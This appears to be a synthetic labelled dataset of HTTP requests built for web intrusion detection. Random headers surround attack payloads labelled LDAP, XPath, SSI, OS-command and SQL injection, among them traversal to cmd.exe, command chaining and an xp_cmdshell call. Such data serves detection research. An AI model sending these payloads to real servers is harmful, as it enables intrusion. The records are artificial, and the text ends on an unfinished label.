POST /sbrn8s2sepTmd9n/nk11f24p1bWK0c63/6Tj4FW8rG6Wa35ntwC0/eqvkE5VEuKGCJN3/3Ymo0nnoE.png? HTTP/1.0
Content-Length: 110
Content-Language: hbeee
Content-Encoding: gzip
Content-Location: /eTmnt.pl
Content-MD5: ZXRwQXNzcG5maW9teXpPcw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 21 Jul 04 08:47:31 CET
Last-Modified: Wed, 26 Jul 06 15:42:42 CET
Host: 142.71.85.160:80
Connection: close
Accept: image/*;q=0.8, video/quicktime;q=0.9, video/*;q=0.2
Accept-Charset: iso-8859-7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 243.13.167.199
Cookie: weLjorsgo=650;o2y1t=1131;7ttfNarfditI=3781683;lxsaytth45=h0iufTnoeeocr3vuRs;IeocsgraEff=Ia8eEssNheem0ori;C7dprma=51024
Cookie2: $Version="571"
Date: Sun, 25 Jan 09 16:14:51 GMT
ETag: W/"sa0vFx7xhNJYWVp7t4"
From: t7in1r0e@I35dntt6be.fr
If-Modified-Since: Tue, 15 Aug 06 02:26:44 UTC
If-Unmodified-Since: Sat, 16 Jan 10 09:05:33 GMT
If-Match: "OSkvfGtAenBHvp1LP"
If-None-Match: *
If-Range: Sun, 03 Oct 04 03:29:53 CET
Max-Forwards: 821
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest username="htyrO"
Authorization: Basic b2xvbDQ6b2Vnc25I
Referer: http://otuxa.net/saoieo.conf
TE: gzip;q=0.3
Trailer: Connection
User-Agent: aa0JXMm.6I http://www.dteu.com
UA-Pixels: 2665x9772
Via: HTTP/9.6 221.168.145.233
Transfer-Encoding: deflate
Upgrade: n2oah/0.8, gvIo/2.6
Warning: 173 www.uucurht.tiff:45369 "maaas3dCteAprn" 
X-Serial-Number: 4606842395290054569

rsshr=25)(&(objectClass=hne)(|(sn   =  yS)(cn=Ti J*))&ncmN3ccTWUusrt=nesl|otua

End - Id: 37512
Start - Id: 37540
class: LdapInjection
PUT /chePRS/tzsTFO/wY2yi5-JIUrdn3aP2NI/i0kxUE0z/udeletebKK/tesia/a93l.sh? HTTP/1.0
Content-Length: 61
Content-Language: gpices,aqsoa,ke
Content-Encoding: deflate
Content-Location: http://gDio9oo.biz/itwts/Tt8r/s1yqt0ih.gz
Content-MD5: ZGFodGhld25pb2lubG50bA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 Oct 07 19:40:03 CET
Last-Modified: Tue, 14 Mar 06 23:41:22 GMT
Host: 41.197.78.70
Connection: close
Accept: text/*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 248.249.188.72
Cookie: hshbenos=jboot.iniD;6DrrETTua=niaehst cb;N3crfhnIlpz=1Sies;utaUeaiaA=aatpanaici0
Cookie2: $Version="00"
Date: Mon, 04 Apr 05 07:22:50 UTC
ETag: "Mxlw8QKTPVHrsMxP"
Expect: 100-continue
From: nIt1h@rvrs.org
If-Modified-Since: Sun, 06 Apr 08 18:27:07 GMT
If-Unmodified-Since: Tue, 08 Jun 04 23:19:38 GMT
If-Match: *
If-None-Match: "0js1S6QGMgvCTJRH"
If-Range: *
Max-Forwards: 1070
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: rertml hneO5=eocht
Authorization: edssen gudohr1a=luooomT
Range: 0516-7855,069180-,334-
Referer: /ewe0eclj/eeHoied.js
TE: chunked
Trailer: TE
User-Agent: itehmstgoniutr
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 523x786
Via: dqhx/9.3 www.3aosh.html, 9.7 www.afuRoia.png
Transfer-Encoding: deflate
Upgrade: uTzmh/1.6, onhq/1.4, ecsat6/1.2, etDno/7.8
Warning: 162 www.befnhlc.css "osea53nrTepho" 
X-Serial-Number: 749091
----: ----------------
~~~~~: ~~~~~~~~~~

ajce=ngu72&bqaaX4ctcmlo8rr=itT)(| (6w=*)&e1r=7089

End - Id: 37540
Start - Id: 39322
class: SSI
GET /etlSj6eZgnEcir8seasn/7CIkuLb_7kHK3MkHw51/aedee/rJWdyLV/i84MUz31f/hE.exe?esrmutdaaswaIte=Bmtlog%7C&ofilm9UyWeeneg=840&6ViCTrbsahhmv=2815804&r7lsrr=%3C%21--%23email+fromhost%3D%22www.mnwsmySu.com%22+tohost%3D%22mailbox.csuo.com%22+message%3D%22ride+ettu3c+irgll+xhd3r%22+fromaddress%3D%22HreEc3.com%22+toaddress%3D%22bUr8I.rlttbe.com%22+subject%3D%22a%22+sender%3D%221ssr.com%22+replyto%3D%22snraphl.com%22+cc%3D%22oet4%22+inreplyto%3D%22anRn+eta+etou%22+id%3D%22mnmail%22+--%3E HTTP/1.0
Host: www.m5eeewS.de
Connection: fstn
Accept: */*
Accept-Charset: ks_c_5601-1987;q=0.8, macintosh, x-mac-ce;q=0.8, iso-2022-jp;q=0.7
Accept-Encoding: *;q=0.7
Accept-Language: Lri-4g4ir, arslIrs-leeetiy
Cache-Control: no-transform
Client-ip: 11.92.216.73
Cookie: radasdashUgon=npsase&i\ah>7;obect3thlp1=ebjwCZ;lxskCbieHrun=Nd0r7t
Cookie2: $Version="904"
Date: Mon, 04 Feb 08 22:13:07 UTC
ETag: "1pA1U.J7IAhA3yekD"
Expect: iinuem
From: fiaotu@eNeFi.it
If-Modified-Since: Sat, 11 Aug 07 18:06:45 CET
If-Unmodified-Since: Thu, 18 Dec 08 19:45:20 GMT
If-Match: *
If-None-Match: "qbykTVARIOjih1@L"
If-Range: "BA0pCKP6iZ1-BYghy"
Max-Forwards: 2
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: hlfen oikmebat=iyvtk
Authorization: Digest nc=2B5f14E5
Range: -7892
Referer: /oqywx.tiff
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.7 (Machintosh; U; Mac OS X 7.5; ya-bH; rv:4.2.8) Gecko/75114559
UA-CPU: MIPS
UA-Disp: 593,4970,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9132x248
Via: HTTP/2.9 www.eiaYgktt.css, 6.8 www.tlWno.tiff, 7.9 www.5vsec.png
Transfer-Encoding: gzip
Upgrade: eseht/3.5, trmE/1.3
Warning: 603 www.gfjcoE2.gif "tntsi" "Thu, 02 Nov 06 09:59:58 UTC"
X-Forwarded-For: 252.189.82.224
X-Serial-Number: 802337450581
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39322
Start - Id: 37143
class: LdapInjection
GET /cnie0an93tqu/SH5-qWiA6AFsrh/o-i@prglZ2ZymDg6gdF/b5d/o4Yt/wm.asp?trOtZ9gseer=seatoneqmo&ered=ij4Ymqww1UGg&tepzsl=9&9a=ioptsawhawmrnulltelnetio&FMhd=%29+++%28%7C++%28+cn%3D*o+++%27brien*%29%28mail+%3D*o++++%27brien*++++%29++&ldwAi=iaorspiecenlduiscriptecn&UlWTunionTix=90745550&tlogHDT=yseiLorptn&a2ycIamrbenasri=yydjfUPPo&nf3ulh=4766 HTTP/1.0
Host: 232.255.156.59:09219
Connection: close
Accept: */*;q=0.3
Accept-Charset: x-mac-chinesesimp, koi8, shift_jis
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=9
Client-ip: 186.207.13.158
Cookie: rite6egi=82199;eeiwtsetai=44391;aazolSc=itrt+;zUnlqLoas8=nari];UnsNrde=el02pnhfeyne5ohh;XdropwheresckDvPC=bit
Cookie2: $Version="395"
Date: Sun, 24 Jun 07 10:45:30 GMT
ETag: W/"0xXDm_hysMwnCgoAJ"
Expect: 100-continue
From: m0oefy@tNuodgrTta.org
If-Modified-Since: Tue, 23 Jan 07 23:28:38 CET
If-Unmodified-Since: Thu, 29 Apr 04 22:21:01 CET
If-Match: "1a6Mi1dl.UsE3pbzY"
If-None-Match: *
If-Range: Wed, 13 Jun 07 10:00:49 GMT
Max-Forwards: 848
MIME-Version: 8.7
Pragma: p0lumc='caall5el'
Proxy-Authorization: NTLM SWhyYWEwZXJOR29UdG5pOGh3c3JhYWRyb2pvbkw1c2VycHU=
Authorization: Digest cnonce="henelise"
Range: 88347-,9-
Referer: /ikuoEr/lexch/sioc.png
TE: trailers,chunked;q=0.8,gzip;q=0.3
Trailer: Accept-Language
User-Agent: Mozilla/8.5 (Machintosh; U; PPC 9.9; io-Iv; rv:1.3.1) Gecko/03930339
UA-CPU: StrongARM
UA-Disp: 529,581,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 617x3755
Via: 1.0 www.ueYrhTot.css, nafl5/8.1 246.237.69.99
Transfer-Encoding: compress
Upgrade: eeobe/9.2, f52tru/3.2, voall/1.2, uIsa/9.0
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 248.38.25.114
X-Serial-Number: 4738976742686812
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37143
Start - Id: 49598
class: XPathInjection
GET /nPL8s4V@VvTTtdOWHbg/3orunoe/ag0l/r7position0/etan/ixrsd9ZJ36LGaQpn@xU/ptzojrspcaqoa/mfel0/ZSKKH.cfm?sttEypt73adpTmi=Etraevalelocationr9uhms%5D%3At%29&cR4PP=eandw&L_0eBQUfU=services1tydk%40%3Bsxoe1htacceshx&jlYunkAY7s4ob8m=am&OyMthk=rqca7gkeb&4eiuoro71rAds=85175368&lyehnNsi=td%3Fnph-C&te=ne%26smo%28nltut&tdt=hlc%2Fhe%2Fhs%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D501%5D++++or++%278nfe%27++++%3D+%27&elt=ta&fid9=29528899&4_Co4img=916&thrOs=cfs&jZNT6pDkAVH=dpZ&lmhuZswieauRce=6392015 HTTP/1.0
Host: www.shDwIxy.uk
Connection: nthenc
Accept: */*;q=0.1
Accept-Charset: iso-8859-6;q=0.5, cp-932;q=0.0, hz-gb-2312, x-mac-chinesetrad;q=0.4, iso-2022-jp
Accept-Encoding: *
Accept-Language: tt-sfrTydme;q=0.4, amRauei-td, vaym4fi-dretr, v0aTn-fcioern;q=0.0, d-sbto
Cache-Control: min-fresh=8
Client-ip: 132.114.34.1
Cookie: FKmwk=n7ntar2sdoiwaE;fht1t=rcdeb8iI8hz;a8aqwrtn83dltti=annddrennkr;aioec=pcB;m36lluxgal8aeth=OoVN
Cookie2: $Version="16"
Date: Wed, 23 Dec 09 15:38:37 UTC
ETag: "45E@hf2nml@00lw"
Expect: 100-continue
From: wiNgsai@oernriaeee.de
If-Modified-Since: Mon, 18 Jun 07 18:56:53 UTC
If-Unmodified-Since: Fri, 05 Feb 10 22:46:31 GMT
If-Match: "bdAg7pMOdqSL86pH3x"
If-None-Match: *
If-Range: "VG00Mw9pd70WJk."
Max-Forwards: 4941
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM ZGRhaWJzeWVub0VzdHN0ZnRIZTBhZXNodHN6MW1ud3RiZWo3Yw==
Authorization: Basic MGNudHNPZjphamF1
Range: 124-314534,89-
Referer: /canWer.cgi
TE: trailers,trailers
Trailer: Range
User-Agent: cllubzT/2.2.6.6
UA-CPU: StrongARM
UA-Disp: 1997,806,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 122x540
Via: HoeC/6.3 www.A2eafeb.png, 4.0 152.187.111.3
Transfer-Encoding: identity
Upgrade: iasi6m/1.5, ep9/4.9, ip9nui/4.5
Warning: 760 227.98.126.37 "nIw39hepCclatnett8" "Tue, 06 Nov 07 04:36:32 GMT"
X-Forwarded-For: 192.195.46.225
X-Serial-Number: 9696710
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49598
Start - Id: 37126
class: LdapInjection
GET /rnRand650U6Kprocessing-instructionD/ynNo/neeoIilsdanaaz/mncg_evalWJ/ears.asmx?iusdEan22nmohl=3932441416&mpotised3c=iuhOEntretrtndhjte&dJ.jQ0as@=positiono%3Clir+0sa&unszsIxa=aL9&osaiubih=st5trl%7Cesock_streamlPEaz8u%3Bposition&6RnetaE=Escripto%3Aohforys&i3covrdrEry=iubitetfmocha&nhh=%29+%28%7C++%28Ieap%3Dof*%29 HTTP/1.0
Host: www.gsqdewu.st:80
Connection: 96lrc
Accept: */*;q=0.9
Accept-Charset: koi8-r;q=0.3, iso-8859-15, x-mac-icelandic;q=0.8
Accept-Encoding: 
Accept-Language: de-cllosLta;q=0.1, eqapR-EDee;q=0.5
Cache-Control: max-age=9832
Client-ip: 55.97.57.216
Cookie: 0hnreid=aeeoav2ep0tliohBSc;ssIse6cheteaid=Aorwb77etsasth
Cookie2: $Version="74"
Date: Sat, 24 Jan 04 19:58:18 UTC
ETag: "vNIt9YlB_Kqpv93dComl"
Expect: seeuhtcr
From: ke6iat@otEmem.org
If-Modified-Since: Mon, 31 Jul 06 20:06:49 GMT
If-Unmodified-Since: Wed, 02 Aug 06 24:10:05 GMT
If-Match: *
If-None-Match: ".kf_KyC@ctRwzdYhEfrw"
If-Range: Tue, 06 May 08 14:13:30 UTC
Max-Forwards: 4
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic ZWVKbmI6ZGk1OHI=
Authorization: see9 isegk=eecbta
Range: -5173
Referer: http://oJut.fr/xtremAo.jsp
TE: gzip,deflate
Trailer: Accept-Language
User-Agent: Mozilla/3.6 (X11; U; SunOS sun4u 5.0; ps-dy; rv:1.9.6) Gecko/78166747
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 617x3755
Via: HTTP/7.7 123.200.210.102
Transfer-Encoding: identity
Upgrade: tRvc9/2.0
Warning: 985 www.hortt.htm "epvsa7dt6thxel" 
X-Forwarded-For: 251.177.162.12
X-Serial-Number: 4738976742686812
----: ---------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 37126
Start - Id: 39424
class: SSI
GET /m_1lAfSsdYdl1/Hoia8dsaaRaEhtie/aallt8snt/tOyMxhb6wtgo/No0iaj3n4s/tjNslc2xKGN6aDLgd/at5ittl74iies/2shAtanobtewneti/pW8ZPg/t9gsRoXhy.m.mdb?rrlornts7adg=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&ntu=2skd%29%5Dtrstdin&hyley9a=tU7WzVmzG&prir=4&menzHqthbts=%7C HTTP/1.1
Host: 246.39.0.87
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: max-age=54051
Client-ip: 138.27.231.125
Cookie: Yo7CyavdYV=867670;8Oa38g0=diveat
Cookie2: $Version="308"
Date: Sat, 24 Feb 07 18:22:15 CET
ETag: W/"L9F0Hm1q-VFB2Ll@_A9"
Expect: 100-continue
From: w3by414@hseh.net
If-Modified-Since: Fri, 05 Dec 08 03:36:22 GMT
If-Unmodified-Since: Wed, 02 Apr 08 16:11:58 CET
If-Match: *
If-None-Match: "cV82osmxVh7jSufW"
If-Range: *
Max-Forwards: 2
MIME-Version: 3.5
Pragma: eh=AynaU
Proxy-Authorization: rashN riiam=cssstki
Authorization: Basic Y2R5YXVyczp0aW5teG9o
Range: 02-,96-
Referer: http://www.t0t7l.fr/yaoh/ilah/92saort/sTqm.css
TE: deflate
Trailer: Upgrade
User-Agent: miA5sb/6.5.4.0
UA-CPU: StrongARM
UA-Disp: 9324,2062,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3896x417
Via: FTP/1.3 www.jaEeuNe.css, HTTP/1.6 www.asueot.htm
Transfer-Encoding: identity
Upgrade: Tnfr/9.0, twtet/7.7, sbse/4.5, iht/4.1, rei/1.4
Warning: 280 113.181.5.189:613 "neo5iip" "Wed, 20 Feb 08 05:16:28 CET"
X-Serial-Number: 599135486061
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39424
Start - Id: 48421
class: XPathInjection
GET /4aeodnfgydoTw4iooe/pueo35vn/4cacJfhUoc1eyo9L0Di.html?HKveB9yrw3kH=itenge&nisiiaru7b=oehoie0wp-gn1o2sht&group byLVSQI1lH=reTfshutdowneece&iqvizosye1sici=ox%3CpasswdrI2TrMi&0Yo9RtmpexecF_@mt=374252&r9fh=69&rkirhr=za&hTedvea=xUhSpLk1&efeseesSla4naod=bfEp0 HTTP/1.1
Host: 130.162.28.52
Connection: OEohER5t
Accept: image/gif
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: max-age=25840
Client-ip: 39.108.198.119
Cookie: hytBk7b=774483;sn0i5=h=)~);l0ont7Rtgcr=is$dFdhBno4lk;s5ya9r4=aynl2'    or  path/child::node()[position()=N] or     'ote3lcic'  =    ';aiettmo=eot
Date: Fri, 12 Jun 09 23:39:49 UTC
If-Modified-Since: Mon, 29 Jun 09 22:00:54 UTC
If-Unmodified-Since: Wed, 25 Nov 09 04:59:44 UTC
If-None-Match: "wTTe-VP9_UANyTOina"
If-Range: Wed, 22 Jun 05 06:21:08 CET
Referer: http://www.gscd.org/st5ohngg/rase6.php
TE: trailers,deflate;q=0.3,deflate
Trailer: Host
User-Agent: fOeeAelphn (ebZyF6Y; kL3P2XU; uyYxT1Fs46)
UA-Color: color32
X-Serial-Number: 2803309
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48421
Start - Id: 40840
class: SSI
GET /o9boot/HHncqwP/aU8l3l0kkB@XY/n_hpHne1fSe.Ew/a@_d/2a0/K_xp_@8nyvaruNgj.5/y1YCLs7lWqmP-X4pBsw/diraxrysattaslhuss/gaeogtehnm.mdb?iy9=10966&Y5am8D=oet&UXlenm1oy=4611874714&suneoiPiaaaei=0dH%24gafuArtno&ortoca=%3C%21--%23odbc++++connect%3D%22dch%2Cfeg%2Cnte%22++++++statement%3D%22select+*++++from+++++Or8%22--%3E&ohtm6tiidhon=txcG2lVQTQ%40&afselhgw=g675e&nlth2eitf=mltaioroaxenn&sgeuewfnde=77841&eaeinsyh=18416402 HTTP/1.0
Host: www.bHinl.cz:80
Connection: close
Accept: */*
Accept-Charset: iso-8859-7, euc-tw, x-mac-ce;q=0.4, iso-8859-2, euc-cn;q=0.9
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 75.99.25.245
Cookie: uhttpsntQFON@sK=8;ScohtNa2tcr4=495574
Cookie2: $Version="9"
Date: Mon, 05 May 08 09:11:34 GMT
ETag: W/"x_WgFNlnOH.LYnJBB"
Expect: 100-continue
From: ieoa@hH3oh2lcin.de
If-Modified-Since: Sat, 29 Jan 05 10:25:30 UTC
If-Unmodified-Since: Tue, 12 Jun 07 16:27:34 UTC
If-Match: "xRhFoymkJFIDpQW"
If-None-Match: *
If-Range: Fri, 07 Apr 06 23:24:03 CET
Max-Forwards: 340
MIME-Version: 9.0
Pragma: nr='g6hat'
Proxy-Authorization: Basic MWFhVG1EOnNsZW9l
Authorization: Digest username="sretcmnN"
Range: 4-703669
Referer: http://Di7f7.be/srmh.pl
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: zadaacjEns/8.3.9
UA-CPU: PowerPC
UA-Disp: 7808,940,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 266x239
Via: 9.1 www.syeee4.htm, HTTP/5.5 21.211.108.139, Aeo5on/8.3 213.101.214.233
Transfer-Encoding: gzip
Upgrade: smTMae/0.2
Warning: 409 198.101.208.57 "eean61TLsanwsEti" "Thu, 01 Apr 10 06:52:14 GMT"
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 546087958111322
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40840
Start - Id: 38532
class: LdapInjection
GET /hnO/LoiSr3bleldksiuHj/X_H/zBQVT@ePMYCsrj/l-PXTgc/iya/ixrOf/g3Rng7/sdi8ae/rE/lli5gnoeezmhsrhdnri.pl?7rdkdjps=6770&yno2=ie+n%5Bi%5Bent7s%29iTt%29%26&eiszasnlEsi=rdha%29%28++++%7C++++%28mio%3D*%29&kmaamititestAbs=79&bheslI=ThrtolsTretnlss&eoaozGtK=rt&A%ubodyautoexecdeletez_=02150&ehfmsnnt9=sRhkM.uNyAa HTTP/1.1
Host: 191.185.195.137
Connection: close
Accept: */*
Accept-Charset: iso-8859-15;q=0.7, iso-8859-5;q=0.8, windows-1250;q=0.0, x-mac-chinesesimp;q=0.0, windows-1258;q=0.9
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.5
Cache-Control: max-stale
Client-ip: 101.131.250.156
Cookie: etsnqlhhvaAsat=jX33dXTIYFO;jueRreeeinuizyb=andTiathiuw;cVpjbsh=ksA|
Cookie2: $Version="13"
Date: Sat, 29 Nov 08 05:28:20 GMT
ETag: "vApdEuQf@AgtqJaUkZ"
Expect: 100-continue
From: n9eatae@mdeel.gov
If-Modified-Since: Sat, 28 Apr 07 05:44:22 GMT
If-Unmodified-Since: Mon, 26 Apr 04 16:27:22 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 19 Sep 04 20:43:32 GMT
Max-Forwards: 2
MIME-Version: 8.2
Pragma: m5Gd='bi26e'
Proxy-Authorization: NTLM Z2RpZWZmYTBGUG1yQWRpSUhuUnQ5SjNpbzNzSWxuZXJVYXRzdGlvZW1veGxJbGlh
Authorization: NTLM YmV3eWVkbGVkM2RvbFFzZW5td0RhYTNUQ3RkZWdzOG4=
Range: 301-86,62-,5905-
Referer: /a8btlo/r9SjlEoi/ebSjelhb/edttsnxE.pdf
TE: gzip,trailers
Trailer: If-Range
User-Agent: Mozilla/7.9 (Machintosh; U; PPC 1.6; eb-ii; rv:3.4.0) Gecko/12931526
UA-CPU: MIPS
UA-Disp: 967,395,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8726x4401
Via: 6.7 www.ahhw5.png:61761, 8.3 www.hehoe.gif
Transfer-Encoding: compress
Upgrade: piFi/9.7, A4e1/7.0, 7lsnih/3.7
Warning: 494 103.11.37.183 "1br62beg" 
X-Forwarded-For: 101.186.114.243
X-Serial-Number: 30599
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38532
Start - Id: 44223
class: OsCommanding
GET /backup/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.fttiEcEbe2.com
Connection: cilc
Accept: */*;q=0.6
Accept-Charset: euc-kr;q=0.4, x-mac-roman;q=0.4
Accept-Encoding: *;q=0.6
Accept-Language: oiea-omeeoC4;q=0.7, qm-aea8nrfp;q=0.9
Cache-Control: max-stale
Client-ip: 224.86.31.255
Cookie: coit4elcsbneac=228;c0uwe2e=5596737
Cookie2: $Version="781"
Date: Wed, 11 Oct 06 17:55:14 UTC
ETag: "YbIP.iawOLfpBceJ7ne"
Expect: 100-continue
From: rOaz@gEadsxsee.biz
If-Modified-Since: Sat, 23 Aug 08 05:22:59 CET
If-Unmodified-Since: Fri, 20 Mar 09 03:34:05 UTC
If-Match: *
If-None-Match: *
If-Range: "sfj@VJX@v8_BJpBn@uF"
Max-Forwards: 6119
MIME-Version: 1.8
Pragma: NuD='0dtugo9'
Proxy-Authorization: Basic aXROTzN0OmZlaWM=
Authorization: btotwa up8Bade=Ag3hH
Range: 09660-850419
Referer: /ortt3/raoeis/eaxoEs/avz4Mr/anycbtin.bin
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.8 (Windows; U; Windows NT 0.5; uy-ne; rv:3.0.6) Gecko/45432043
UA-CPU: PowerPC
UA-Disp: 220,5543,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 352x848
Via: 8.3 www.apL7ee.shtml:97, 8.2 www.suDis.shtml
Transfer-Encoding: eioon; ioTauWiM=aiit3ka
Upgrade: eylet/4.8, moe/0.2, jtiu/7.5, ratas/1.7, ott/5.5
Warning: 268 161.222.182.214 "sxsom" 
X-Forwarded-For: 65.185.122.174
X-Serial-Number: 33909969
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 44223
Start - Id: 44471
class: OsCommanding
GET ..�../..�../mssql7/install/pubtext.bat" & dir c: .exe? HTTP/1.0
Host: www.eEicEito.fr
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.6, deflate
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 1.111.16.222
Cookie: sasni=0;2gCbr1niisf=cEGXIc4;dndDieyehnPey=fbssteNrxtermAiet;qr.passwdLFR=olecsAgsetraiy;rhst=386658
Cookie2: $Version="38"
Date: Sun, 29 May 05 07:33:14 UTC
ETag: "9tG0dVXV9Y0RyLYk3AXZ"
Expect: gnetsmnu=tlaou;tnr3Ia5i=Cmw8
From: bniw@mamjmaT.net
If-Modified-Since: Wed, 01 Dec 04 09:54:12 UTC
If-Unmodified-Since: Fri, 25 Jul 08 13:35:25 GMT
If-Match: "nTPMIixCYYawxKeXCE"
If-None-Match: "@0agL0twbZzBoki6N88p"
If-Range: *
Max-Forwards: 8
MIME-Version: 3.4
Pragma: 7pYecmhh='arng'
Proxy-Authorization: Digest cnonce="suean1t"
Authorization: Digest response="5Ca3d6C7EADEccFB4E4ABAfdCeEAFC47"
Range: 6-02287,72753-
Referer: /gIhs.tar
TE: chunked;q=0.7,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/1.0 (Machintosh; U; PPC Mac OS X 6.0; sr-vr; rv:7.7.1) Gecko/08424694
UA-CPU: Sparc
UA-Disp: 970,105,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 448x826
Via: HTTP/7.0 229.21.102.43, o1lt8A/8.7 www.R9sre.jpg, 5.4 www.aviaki.js:75
Transfer-Encoding: compress
Upgrade: eoennr/7.4, 8ld/4.6
Warning: 731 100.170.76.46 "ehlcumeiuEsibidnig" "Sat, 04 Sep 04 07:51:46 UTC"
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 73463
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44471
Start - Id: 40991
class: SqlInjection
GET /atsazntoriri/uJ/lg67.37aRD4Dwr_dm/Tvautoexec.exe?veiLvoovaxo=sxNmO&G_WTimgtetVRSC=as365&dmxo=s%5Dn&ny7amnnym=0472661307&5EkP=wsdeeq%28deletea&v6uo9qs=yuaasEcra&ae0=h-ar&ndnhBRNwt1lgmeo=189990159&byle0eynoqe=8ofnzsqnn&d1yjmhe5cc565=pdaey&EnsErtnT=iwjce9 HTTP/1.0
Host: 145.211.105.76
Connection: close
Accept: application/zip
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: bqoe='mjdatS'
Cookie: mxGL@MGl=';EXEC   master.dbo.xp_cmdshell     'cmd.exe
Date: Thu, 05 Jun 08 03:22:07 CET
From: sa6ceim@tohgie.fr
If-Unmodified-Since: Fri, 21 Sep 07 22:07:02 GMT
If-Match: "fBcd3Xs@-oT8wxLU4C"
Max-Forwards: 269
Pragma: no-cache
Authorization: Digest cnonce="io3Eer"
Range: 194543-7,742178-6,7187-
Referer: /ndhHR/racydnME.swf
Trailer: If-None-Match
User-Agent: Mozilla/3.8 (X11; U; Linux i586 6.8; ew-In; rv:3.1.8) Gecko/48865278
Via: 2.8 229.99.0.132, 6.8 www.sot4sfh.jpeg, 7.9 176.0.27.201
X-Serial-Number: 04032727285571995188

null

End - Id: 40991
Start - Id: 35202
class: SqlInjection
GET /anJDlzsJmrhWD90p/iDhwweafei.asmx?nh11tcu=%27++OR++%274maheta%27++++LIKE++%27aze%2525&NtaoIE1r=eas%29ln&icak=atw HTTP/1.1
Host: www.eTeiae6a.de
Connection: mwaeet
Accept: image/png
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=21297
Client-ip: 78.116.124.236
Cookie: qjPdocument=otail;rnnt=smaqise
Cookie2: $Version="796"
Date: Thu, 24 May 07 08:32:43 UTC
ETag: W/"LM@OO5twrv6vOD3z@"
Expect: 100-continue
From: os33et6k@EniiktZna.uk
If-Modified-Since: Sun, 26 Oct 08 12:56:38 UTC
If-Unmodified-Since: Sun, 15 May 05 21:00:49 CET
If-Match: "Km7KKJO3GBaAtLOqHxU"
If-None-Match: *
If-Range: Fri, 04 Jan 08 08:25:06 CET
Max-Forwards: 968
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: 9trc 8rehoi=lhgsh5
Authorization: lnie e8dsIrte=ositt
Range: 786796-,-020
Referer: http://Eo4dorn.ch/tmToit/exae/xjvoick/homtlie2/hdpE.php3
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/3.9 (X11; U; Open BSD i386 8.6; oa-0o; rv:2.1.3) Gecko/89528324
UA-CPU: Sparc
UA-Disp: 601,1500,16
UA-Color: color32
UA-Pixels: 0990x1742
Via: AoiaH/8.5 www.jmbewe.htm, radkp/7.2 www.naaMsp.css, 9.8 www.Kiihi.html
Transfer-Encoding: identity
Upgrade: Iivqh/4.1, nEStsn/0.1, ocna/1.5, bea/5.8, n7i/2.7
Warning: 562 145.202.157.174 "Eninnaeeoatl9O4t" "Mon, 02 Feb 04 01:35:42 GMT"
X-Forwarded-For: 74.88.12.154
X-Serial-Number: 653794992925901
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35202
Start - Id: 49848
class: XPathInjection
